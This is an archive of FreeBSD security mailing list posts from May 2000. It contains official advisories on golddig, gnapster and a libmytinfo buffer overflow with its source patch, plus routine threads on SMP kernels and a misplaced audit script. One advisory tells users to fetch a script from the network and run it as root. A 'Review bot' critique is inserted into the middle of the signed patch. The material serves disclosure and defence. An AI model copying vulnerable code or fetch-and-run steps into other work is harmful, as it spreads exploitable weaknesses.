Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

[snip]
Backup passwd and group files:
envy.vuurwerk.nl passwd diffs:
3c3
< root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash
---
> root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash
[snip]

This line needed some thinking from me until I realized that it was trying to tell me the root password changed (which I already knew, of course). Could this be made more obvious, something like (password1) in the top one and (password2) in the bottom one?

Greetz, Peter.
--
Peter van Dijk - student/sysadmin/ircoper/madly in love/pretending coder
|
| 'C makes it easy to shoot yourself in the foot;
| C++ makes it harder, but when you do it blows your whole leg off.'
| Bjarne Stroustrup, Inventor of C++

From owner-freebsd-security Tue May 9 6:20: 9 2000
Delivered-To: freebsd-security@freebsd.org
Received: from hotmail.com (f9.law8.hotmail.com [216.33.241.9]) by hub.freebsd.org (Postfix) with SMTP id 9212F37BDFC for ; Tue, 9 May 2000 06:20:05 -0700 (PDT) (envelope-from madrapour@hotmail.com)
Received: (qmail 4408 invoked by uid 0); 9 May 2000 13:20:04 -0000
Message-ID: <20000509132004.4407.qmail@hotmail.com>
Received: from 195.146.33.150 by www.hotmail.com with HTTP; Tue, 09 May 2000 06:20:04 PDT
X-Originating-IP: [195.146.33.150]
From: "N. N.M"
To: security@freebsd.org
Subject: Maybe off topic
Date: Tue, 09 May 2000 06:20:04 PDT
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi everybody,

Sorry in advance if my question sounds off. I installed FreeBSD 3.2 on a dual-processor PC. How can I make sure that the OS detects that? (it seems that it doesn't). Do I need any extra configuration (more than default configuration) to force FreeBSD 3.2 to detect it?

All comments are appreciated.
Thanks a lot,
Nazila M.
________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com

From owner-freebsd-security Tue May 9 6:32: 8 2000
Delivered-To: freebsd-security@freebsd.org
Received: from cricket.mindcrime.net (cricket.mindcrime.net [209.70.202.96]) by hub.freebsd.org (Postfix) with ESMTP id 41AFF37BE08 for ; Tue, 9 May 2000 06:32:03 -0700 (PDT) (envelope-from sagem@cricket.mindcrime.net)
Received: from cricket.mindcrime.net (cricket.mindcrime.net [209.70.202.96]) by cricket.mindcrime.net (8.9.3/8.9.3) with ESMTP id IAA36221; Tue, 9 May 2000 08:33:51 GMT (envelope-from sagem@cricket.mindcrime.net)
Date: Tue, 9 May 2000 08:33:51 +0000 (GMT)
From: sage@ec-raves.com
X-Sender: sagem@cricket.mindcrime.net
To: "N. N.M"
Cc: security@FreeBSD.ORG
Subject: Re: Maybe off topic
In-Reply-To: <20000509132004.4407.qmail@hotmail.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

comment out these

    #cpu I386_CPU
    #cpu I486_CPU

uncomment out these

    # To make an SMP kernel, the next two are needed
    options SMP # Symmetric MultiProcessor Kernel
    options APIC_IO # Symmetric (APIC) I/O

and recompile your kernel

On Tue, 9 May 2000, N. N.M wrote:

> Hi everybody,
>
> Sorry in advance if my question sounds off. I installed FreeBSD 3.2 on a
> dual-processor PC. How can I make sure that the OS detects that? (it seems that
> it doesn't). Do I need any extra configuration (more than default
> configuration) to force FreeBSD 3.2 to detect it?
>
> All comments are appreciated.
> Thanks a lot,
> Nazila M.
>

From owner-freebsd-security Tue May 9 7:28:51 2000
Delivered-To: freebsd-security@freebsd.org
Received: from hotmail.com (f7.law8.hotmail.com [216.33.241.7]) by hub.freebsd.org (Postfix) with SMTP id B575837BE98 for ; Tue, 9 May 2000 07:28:44 -0700 (PDT) (envelope-from madrapour@hotmail.com)
Received: (qmail 11448 invoked by uid 0); 9 May 2000 14:28:43 -0000
Message-ID: <20000509142843.11447.qmail@hotmail.com>
Received: from 195.96.144.44 by www.hotmail.com with HTTP; Tue, 09 May 2000 07:28:43 PDT
X-Originating-IP: [195.96.144.44]
From: "N. N.M"
To: andersonfox@mail.ru, sage@ec-raves.com
Cc: security@freebsd.org
Subject: Re: Maybe off topic
Date: Tue, 09 May 2000 07:28:43 PDT
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Thanks both of you for your comments. I tried what one of you told me about commenting out two lines (i386 and i384) and uncommenting out the lines related to SMP support and then recompile the kernel. But nothing was changed. And in the output of "top" command I still don't have CPU0 and CPU1. Any other idea on what I can check or change?

thanks a lot for your time,
Nazila M.

>From: Fox Anderson
>To: "N. N.M"
>Subject: Re: Maybe off topic
>Date: Wed, 10 May 2000 16:25:19 +0300
>
>On Tue, 09 May 2000, you wrote:
> > Hi everybody,
> >
> > Sorry in advance if my question sounds off. I installed FreeBSD 3.2 on a
> > dual-processor PC. How can I make sure that the OS detects that? (it seems that
> > it doesn't). Do I need any extra configuration (more than default
> > configuration) to force FreeBSD 3.2 to detect it?
> >
> > All comments are appreciated.
> > Thanks a lot,
> > Nazila M.
>
>You have to compile your kernel with SMP support. Then reboot and run top.
>You'll see CPU0 and CPU1 in STATE column.
> good luck.

From owner-freebsd-security Tue May 9 7:37:14 2000
Delivered-To: freebsd-security@freebsd.org
Received: from testbed.baileylink.net (testbed.baileylink.net [63.71.213.24]) by hub.freebsd.org (Postfix) with ESMTP id EF5DD37BE8E for ; Tue, 9 May 2000 07:37:03 -0700 (PDT) (envelope-from brad@testbed.baileylink.net)
Received: (from brad@localhost) by testbed.baileylink.net (8.9.3/8.9.3) id JAA07701; Tue, 9 May 2000 09:37:10 -0500 (CDT) (envelope-from brad)
Date: Tue, 9 May 2000 09:37:10 -0500
From: Brad Guillory
To: "N. N.M"
Cc: andersonfox@mail.ru, sage@ec-raves.com, freebsd-security@freebsd.org
Subject: Very far off topic (was Maybe off topic)
Message-ID: <20000509093710.B5901@baileylink.net>
References: <20000509142843.11447.qmail@hotmail.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Mailer: Mutt 1.0i
In-Reply-To: <20000509142843.11447.qmail@hotmail.com>; from madrapour@hotmail.com on Tue, May 09, 2000 at 07:28:43AM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

This is very very far off charter. There is an SMP mailing list, why did you choose security? Please move this thread there.

More info about the mailing lists is here:
http://www.freebsd.org/handbook/eresources.html#ERESOURCES-MAIL

And you can search the archives here:
http://www.freebsd.org/search/#mailinglists

BMG

On Tue, May 09, 2000 at 07:28:43AM -0700, N. N.M wrote:
> Thanks both of you for your comments. I tried what one of you told me about
> commenting out two lines (i386 and i384) and uncommenting out the lines
> related to SMP support and then recompile the kernel. But nothing was
> changed. And in the output of "top" command I still don't have CPU0 and
> CPU1. Any other idea on what I can check or change?
>
> thanks a lot for your time,
> Nazila M.
>
> >From: Fox Anderson
> >To: "N. N.M"
> >Subject: Re: Maybe off topic
> >Date: Wed, 10 May 2000 16:25:19 +0300
> >
> >On Tue, 09 May 2000, you wrote:
> > > Hi everybody,
> > >
> > > Sorry in advance if my question sounds off. I installed FreeBSD 3.2 on a
> > > dual-processor PC. How can I make sure that the OS detects that? (it seems that
> > > it doesn't). Do I need any extra configuration (more than default
> > > configuration) to force FreeBSD 3.2 to detect it?
> > >
> > > All comments are appreciated.
> > > Thanks a lot,
> > > Nazila M.
> >
> >You have to compile your kernel with SMP support. Then reboot and run top.
> >You'll see CPU0 and CPU1 in STATE column.
> > good luck.

--
   __O
 _-\<,_     Why drive when you can bike?
(_)/ (_)

From owner-freebsd-security Tue May 9 12:15:21 2000
Delivered-To: freebsd-security@freebsd.org
Received: by hub.freebsd.org (Postfix, from userid 758) id 385BC37BEA3; Tue, 9 May 2000 12:15:12 -0700 (PDT)
From: FreeBSD Security Officer
Subject: FreeBSD Security Advisory: FreeBSD-SA-00:16.golddig
Reply-To: security-officer@freebsd.org
From: FreeBSD Security Officer
Message-Id: <20000509191512.385BC37BEA3@hub.freebsd.org>
Date: Tue, 9 May 2000 12:15:12 -0700 (PDT)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-00:16                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          golddig port allows users to overwrite local files

Category:       ports
Module:         golddig
Announced:      2000-05-09
Credits:        Discovered during internal ports collection auditing.
Affects:        Ports collection.
Corrected:      2000-04-30
Vendor status:  Email bounced.
FreeBSD only:   NO

I.   Background

Golddig is an X11 game provided as part of the FreeBSD ports collection.

II.  Problem Description

The golddig port erroneously installs a level-creation utility setuid
root, which allows users to overwrite the contents of arbitrary local
files. It is not believed that any elevation of privileges is possible
with this vulnerability because the contents of the file are a textual
representation of a golddig game level which is highly constrained.

The golddig port is not installed by default, nor is it "part of FreeBSD"
as such: it is part of the FreeBSD ports collection, which contains over
3200 third-party applications in a ready-to-install format. The ports
collection shipped with FreeBSD 4.0 contains this problem since it was
discovered after the release.

FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security audit
of the most security-critical ports.

III. Impact

An unprivileged local user can overwrite the contents of any file,
although they are restricted in the possible contents of the new file.

If you have not chosen to install the golddig port/package, then your
system is not vulnerable to this problem.

IV.  Workaround

One of the following:

1) Deinstall the golddig port/package, if you have installed it.

2) Remove the setuid bit from /usr/local/bin/makelev. This will mean
unprivileged users cannot create or modify golddig levels except in
their own directories.

V.   Solution

One of the following:

1) Upgrade your entire ports collection and rebuild the golddig port.

2) Reinstall a new package dated after the correction date, obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/games/golddig-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/games/golddig-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/games/golddig-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/games/golddig-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/games/golddig-2.0.tgz

Note: it may be several days before the updated packages are available.

3) Download a new port skeleton for the golddig port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:

ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/devel/portcheckout-1.0.tgz

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBORhjV1UuHi5z0oilAQHa4AP8D5QZo+zNieNemPMfMW77JIxsHtCHCg+M
MEG6CkJ6QOZlwJ8Mav1ExMyQywWncccgkazBFyK2KG5rAqpxX4KMZ+C3zfysTraS
cHVCVBw73yx0t53/FnvoR3yqtI+GdmhPaw9X3icCtp9st3hiSMF759yPqOUKBbIu
JFgdfAuXaqs=
=Pxca
-----END PGP SIGNATURE-----

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue May 9 12:21: 9 2000
Delivered-To: freebsd-security@freebsd.org
Received: by hub.freebsd.org (Postfix, from userid 758) id 5712437BFB7; Tue, 9 May 2000 12:20:49 -0700 (PDT)
From: FreeBSD Security Officer
Subject: FreeBSD Security Advisory: FreeBSD-SA-00:17.libmytinfo
Reply-To: security-officer@freebsd.org
From: FreeBSD Security Officer
Message-Id: <20000509192049.5712437BFB7@hub.freebsd.org>
Date: Tue, 9 May 2000 12:20:49 -0700 (PDT)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-00:17                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          Buffer overflow in libmytinfo may yield increased
                privileges with third-party software.

Category:       core
Module:         libmytinfo
Announced:      2000-05-09
Affects:        FreeBSD 3.x before the correction date.
Corrected:      2000-04-25
FreeBSD only:   Yes

Patches:        ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:17/libmytinfo.patch

I.   Background

libmytinfo is part of ncurses, a text-mode display library.

II.  Problem Description

libmytinfo allows users to specify an alternate termcap file or entry
via the TERMCAP environment variable, however this is not handled
securely and contains an overflowable buffer inside the library.

This is a security vulnerability for binaries which are linked against
libmytinfo and which are setuid or setgid (i.e. run with elevated
privileges). It may also be a vulnerability in other more obscure
situations where a user can exert control over the environment with
which an ncurses binary is run by another user.

FreeBSD 3.x and earlier versions use a very old, customized version of
ncurses which is difficult to update without breaking
backwards-compatibility. The update was made for FreeBSD 4.0, but it is
unlikely that 3.x will be updated. However, the ncurses source is
currently being audited for further vulnerabilities.

III. Impact

Certain setuid/setgid third-party software (including FreeBSD
ports/packages) may be vulnerable to a local exploit yielding privileged
resources, such as network sockets, privileged filesystem access, or
outright privileged shell access (including root access).

No program in the FreeBSD base system is believed to be vulnerable to
the bug.

FreeBSD 4.0 and above are NOT vulnerable to this problem.

IV.  Workaround

Remove any setuid or setgid binary which is linked against libmytinfo
(including statically linked), or remove set[ug]id privileges from the
file as appropriate.

The following instructions will identify the binaries installed on the
system which are candidates for removal or removal of file permissions.
Since there may be other as yet undiscovered vulnerabilities in
libmytinfo it may be wise to perform this audit regardless of whether or
not you upgrade your system as described in section V below. In
particular, see the note regarding static linking in section V.

Of course, it is possible that some of the identified files may be
required for the correct operation of your local system, in which case
there is no clear workaround except for limiting the set of users who
may run the binaries, by an appropriate use of user groups and removing
the "o+x" file permission bit.

1) Download the 'libfind.sh' script from

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:17/libfind.sh

e.g. with the fetch(1) command:

# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:17/libfind.sh
Receiving libfind.sh (460 bytes): 100%
460 bytes transferred in 0.0 seconds (394.69 Kbytes/s)
#

2) Verify the md5 checksum and compare to the value below:

# /sbin/md5 libfind.sh
MD5 (libfind.sh) = 59dceaa76d6440c58471354a10a8fb0b

3) Run the libfind script against your system:

# sh libfind.sh /

This will scan your entire system for setuid or setgid binaries which
are linked against libmytinfo. Each returned binary should be examined
(e.g. with 'ls -l' and/or other tools) to determine what security risk
it poses to your local environment, e.g. whether it can be run by
arbitrary local users who may be able to exploit it to gain privileges.

4) Remove the binaries, or reduce their file permissions, as appropriate.

V.
Solution Upgrade your FreeBSD 3.x system to 3.4-STABLE after the correction date, or patch your present system source code and rebuild. Then run the libfind script as instructed in section IV and identify any statically-linked binaries (those reported as "STATIC" by the libfind script). These should either be removed, recompiled, or have privileges restricted to secure them against this vulnerability (since statically-linked binaries will not be affected by recompiling the shared libmytinfo library). To patch your present system: save the patch below into a file, and execute the following commands as root: cd /usr/src/lib/libmytinfo patch < /path/to/patch/file make all make install Patches for 3.x systems before the resolution date: Index: findterm.c =================================================================== RCS file: /usr/cvs/src/lib/libmytinfo/Attic/findterm.c,v retrieving revision 1.3 diff -u -r1.3 findterm.c --- findterm.c 1997/08/13 01:21:36 1.3 +++ findterm.c 2000/04/25 16:58:19 @@ -242,7 +242,7 @@ } else { s = path->file; d = buf; - while(*s != '\0' && *s != ':') + while(*s != '\0' && *s != ':' && d - buf < MAX_LINE - 1) *d++ = *s++; *d = '\0'; if (_tmatch(buf, name)) { 
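Review bot: The new bound in the ':' loop of findterm.c truncates silently. When the name in path->file is longer than MAX_LINE - 1, the loop stops early, buf is terminated, and the shortened string is still handed to _tmatch(buf, name), so an over-long name can match on its prefix. Consider skipping the entry when the loop exits with *s being neither '\0' nor ':'. The check also assumes buf holds at least MAX_LINE bytes, which this hunk does not show; if buf is a local array, bounding on sizeof(buf) - 1 would tie the limit to the declaration. The same two points apply to the ',' loop in the second hunk.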
@@ -259,7 +259,7 @@ } else { s = path->file; d = buf; - while(*s != '\0' && *s != ',') + while(*s != '\0' && *s != ',' && d - buf < MAX_LINE - 1) *d++ = *s++; *d = '\0'; if (_tmatch(buf, name)) { -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBORc3NFUuHi5z0oilAQGcaAP6Ar4+mNTHR/qXUJ+MFIVy+AQHFDwpYq5f KgBpCRzgKVZs/zfsQ+LwC1vCHzusftTK0lEd//2pfGZHt3ln0eD1s6qt+Q6+ZJBE MYYiXvqoBL1ob2Ahts6uEUs/vbMb4bCbEmMCn4ad2iU+neKH9a81Lk3frIaJjAVK 8/6vW7wH9W4= =NDsR -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 9 12:24:18 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 5EEE137BEB2; Tue, 9 May 2000 12:24:03 -0700 (PDT) From: FreeBSD Security Officer Subject: FreeBSD Security Advisory: FreeBSD-SA-00:18.gnapster Reply-To: security-officer@freebsd.org 
From: FreeBSD Security Officer
Message-Id: <20000509192403.5EEE137BEB2@hub.freebsd.org>
Date: Tue, 9 May 2000 12:24:03 -0700 (PDT)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-00:18                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          gnapster port allows remote users to view local files

Category:       ports
Module:         gnapster
Announced:      2000-05-09
Credits:        Fixed by vendor.
Affects:        Ports collection.
Corrected:      2000-04-29
Vendor status:  Updated version released.
FreeBSD only:   NO

I.   Background

Gnapster is a client for the Napster file-sharing network.

II.  Problem Description

The gnapster port (version 1.3.8 and earlier) contains a vulnerability
which allows remote gnapster users to view any file on the local system
which is accessible to the user running gnapster. Gnapster does not run
with elevated privileges, so it is only the user's regular filesystem
access permissions which are involved.

The gnapster port is not installed by default, nor is it "part of
FreeBSD" as such: it is part of the FreeBSD ports collection, which
contains over 3200 third-party applications in a ready-to-install
format. The ports collection shipped with FreeBSD 4.0 contains this
problem since it was discovered after the release.

FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security audit
of the most security-critical ports.

III. Impact

Remote users can view files accessible to the user running the gnapster
client.

If you have not chosen to install the gnapster port/package, then your
system is not vulnerable to this problem.

IV.  Workaround

Deinstall the gnapster port/package, if you have installed it.

V.   Solution

One of the following:

1) Upgrade your entire ports collection and rebuild the gnapster port.

2) Reinstall a new package dated after the correction date, obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/audio/gnapster-1.3.9.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/audio/gnapster-1.3.9.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/audio/gnapster-1.3.9.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/audio/gnapster-1.3.9.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/audio/gnapster-1.3.9.tgz

Note: it may be several days before the updated packages are available.

3) Download a new port skeleton for the gnapster port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:

ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/devel/portcheckout-1.0.tgz

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBORhlmVUuHi5z0oilAQGytwQApAKwVXvt2Aw6JXMHetWyRLns2wPWT6l3
eIdlkGSesqJlxeeR22wfxWlqcFo3U2D8hlIcWCPCB5y7ejJ3MyeMU895OjJGZ5ii
wNe5OabbNwnWjEQmMH8AB4c/zy8GRI9xTOMW/KAcoH5TGhmzJ+29KIYYFwJXlek7
Ywc5E9+Q0pw=
=Yr2H
-----END PGP SIGNATURE-----

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue May 9 13:53:48 2000
Delivered-To: freebsd-security@freebsd.org
Received: from pogo.caustic.org (pogo.caustic.org [208.44.193.69]) by hub.freebsd.org (Postfix) with ESMTP id C2D0037BEE1 for ; Tue, 9 May 2000 13:53:38 -0700 (PDT) (envelope-from jan@caustic.org)
Received: from localhost (jan@localhost) by pogo.caustic.org (8.10.0/ignatz) with ESMTP id e49KvFJ82966 for ; Tue, 9 May 2000 13:57:15 -0700 (PDT)
Date: Tue, 9 May 2000 13:57:15 -0700 (PDT)
From: "f.johan.beisser"
To: security@freebsd.org
Subject: oosp?
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

in the latest set of warnings for freebsd 3.x, a script is referenced
(libfind.sh) that isn't existing on the ftp site.

anyone have it?

thanks,
jan

+-----/ f. johan beisser /------------------------------+
email: jan[at]caustic.org web: http://www.caustic.org/~jan
"knowledge is power. power corrupts. study hard, be evil."

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue May 9 13:59:56 2000
Delivered-To: freebsd-security@freebsd.org
Received: from winconx.com (ns1.winconx.net [208.60.80.2]) by hub.freebsd.org (Postfix) with SMTP id D7A3737BF91 for ; Tue, 9 May 2000 13:59:51 -0700 (PDT) (envelope-from travis@winconx.com)
Received: (qmail 8305 invoked from network); 9 May 2000 21:03:01 -0000
Received: from dhcp01.winconx.net (HELO travis) (208.60.80.32) by ns1.winconx.net with SMTP; 9 May 2000 21:03:01 -0000
Message-ID: <028301bfb9f9$7ef146c0$20503cd0@travis>
From: "Travis Leuthauser"
To: "f.johan.beisser" ,
References:
Subject: Re: oosp?
Date: Tue, 9 May 2000 15:59:41 -0500
Organization: DDS Group of Companies
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6600
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

The script is actually at
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/libfind.sh

Travis Leuthauser
Network Administrator
DDS Group

----- Original Message -----
From: "f.johan.beisser"
To:
Sent: Tuesday, May 09, 2000 3:57 PM
Subject: oosp?

>
> in the latest set of warnings for freebsd 3.x, a script is referenced
> (libfind.sh) that isn't existing on the ftp site.
>
> anyone have it?
>
> thanks,
> jan
>
> +-----/ f. johan beisser /------------------------------+
> email: jan[at]caustic.org web: http://www.caustic.org/~jan
> "knowledge is power. power corrupts. study hard, be evil."
>
>
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue May 9 14: 4:13 2000
Delivered-To: freebsd-security@freebsd.org
Received: from pogo.caustic.org (pogo.caustic.org [208.44.193.69]) by hub.freebsd.org (Postfix) with ESMTP id 5C6D637BFE2 for ; Tue, 9 May 2000 14:04:07 -0700 (PDT) (envelope-from jan@caustic.org)
Received: from localhost (jan@localhost) by pogo.caustic.org (8.10.0/ignatz) with ESMTP id e49L7dh83042; Tue, 9 May 2000 14:07:40 -0700 (PDT)
Date: Tue, 9 May 2000 14:07:39 -0700 (PDT)
From: "f.johan.beisser"
To: Travis Leuthauser
Cc: security@freebsd.org
Subject: Re: oosp?
In-Reply-To: <028301bfb9f9$7ef146c0$20503cd0@travis>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

yeah, i just caught that. oosp again.

thanks :)

On Tue, 9 May 2000, Travis Leuthauser wrote:

> The script is actually at
> ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/libfind.sh
>
> Travis Leuthauser
> Network Administrator
> DDS Group
>

+-----/ f. johan beisser /------------------------------+
email: jan[at]caustic.org web: http://www.caustic.org/~jan
"knowledge is power. power corrupts. study hard, be evil."

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue May 9 15:19:33 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 21F1037BEA3; Tue, 9 May 2000 15:19:30 -0700 (PDT) (envelope-from kris@FreeBSD.org)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id PAA45450; Tue, 9 May 2000 15:19:29 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Tue, 9 May 2000 15:19:23 -0700 (PDT)
From: Kris Kennaway
To: Travis Leuthauser
Cc: "f.johan.beisser" , security@freebsd.org
Subject: Re: oosp?
In-Reply-To: <028301bfb9f9$7ef146c0$20503cd0@travis>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 9 May 2000, Travis Leuthauser wrote:

> The script is actually at
> ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/libfind.sh

Sorry about this, folks - the FTP site has been updated with a link
pointing to the correct location.

Kris

- ----
In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Comment: Made with pgp4pine 1.74
Charset: noconv

iQCVAwUBORiO8VUuHi5z0oilAQFiBgQAijZJn+o/XSiYtJLuywmQRHoNwjElwBk2
8XisqdhagdzvfQRNIBFx5YDYDEJc1YOFy0g0S7QGKUk1/GuGxcFKBgGO39RGJiWs
KuQZfT8/zyX7gS02y1XZahNAHkSTWxQFVDsqlkJ3ZmKWKYFbIzy2CGCZy2zHzK9A
9LEGTTs4OU0=
=hCKa
-----END PGP SIGNATURE-----

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue May 9 18:55:34 2000
Delivered-To: freebsd-security@freebsd.org
Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id 8D47037B616 for ; Tue, 9 May 2000 18:55:26 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com)
Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.9.3) id VAA29940; Tue, 9 May 2000 21:55:16 -0400 (EDT) (envelope-from cjc)
Date: Tue, 9 May 2000 21:55:16 -0400
From: "Crist J. Clark"
To: Peter van Dijk
Cc: security@FreeBSD.ORG
Subject: Re: envy.vuurwerk.nl daily run output
Message-ID: <20000509215515.B29766@cc942873-a.ewndsr1.nj.home.com>
Reply-To: cjclark@home.com
References: <20000509150609.L42267@vuurwerk.nl>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <20000509150609.L42267@vuurwerk.nl>; from petervd@vuurwerk.nl on Tue, May 09, 2000 at 03:06:09PM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, May 09, 2000 at 03:06:09PM +0200, Peter van Dijk wrote:
> [snip]
>
> Backup passwd and group files:
> envy.vuurwerk.nl passwd diffs:
> 3c3
> < root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash
> ---
> > root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash
> [snip]
>
> This line needed some thinking from me until I realized that it was trying
> to tell me the root password changed (which I already knew, of course). Could
> this be made more obvious, something like (password1) in the top one and
> (password2) in the bottom one?

Can you think of a clean way to do it? You do not want to show
'password1' and 'password2' if the password _didn't_ change, right?
Now, for the case above, it is easy enough, but you need to handle
the possibility of multiple changes.

Sure, it's quite possible to do with awk(1) or perl(1), but IMHO, I'll
take the simple solution in 200.backup-passwd over something that
would need to be fairly complicated. Personally, I don't think most
people stare too long at the above line before figuring it out, and
once they do, they never have trouble spotting it again.

Then again... If someone sees a quick way to do it...
--
Crist J. Clark cjclark@home.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed May 10 0:53: 7 2000
Delivered-To: freebsd-security@freebsd.org
Received: from pr.infosec.ru (pr.infosec.ru [194.135.141.98]) by hub.freebsd.org (Postfix) with ESMTP id 4F32837B545 for ; Wed, 10 May 2000 00:52:59 -0700 (PDT) (envelope-from blaze@infosec.ru)
Received: from blaze (200.0.0.51 [200.0.0.51]) by pr.infosec.ru with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id K2Q3CTJR; Wed, 10 May 2000 11:53:05 +0400
Date: Wed, 10 May 2000 11:55:10 +0400 (MSD)
From: Andrey Sverdlichenko
X-Sender: blaze@blaze
To: security@FreeBSD.ORG
Subject: Re: Cryptographic dump(8)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
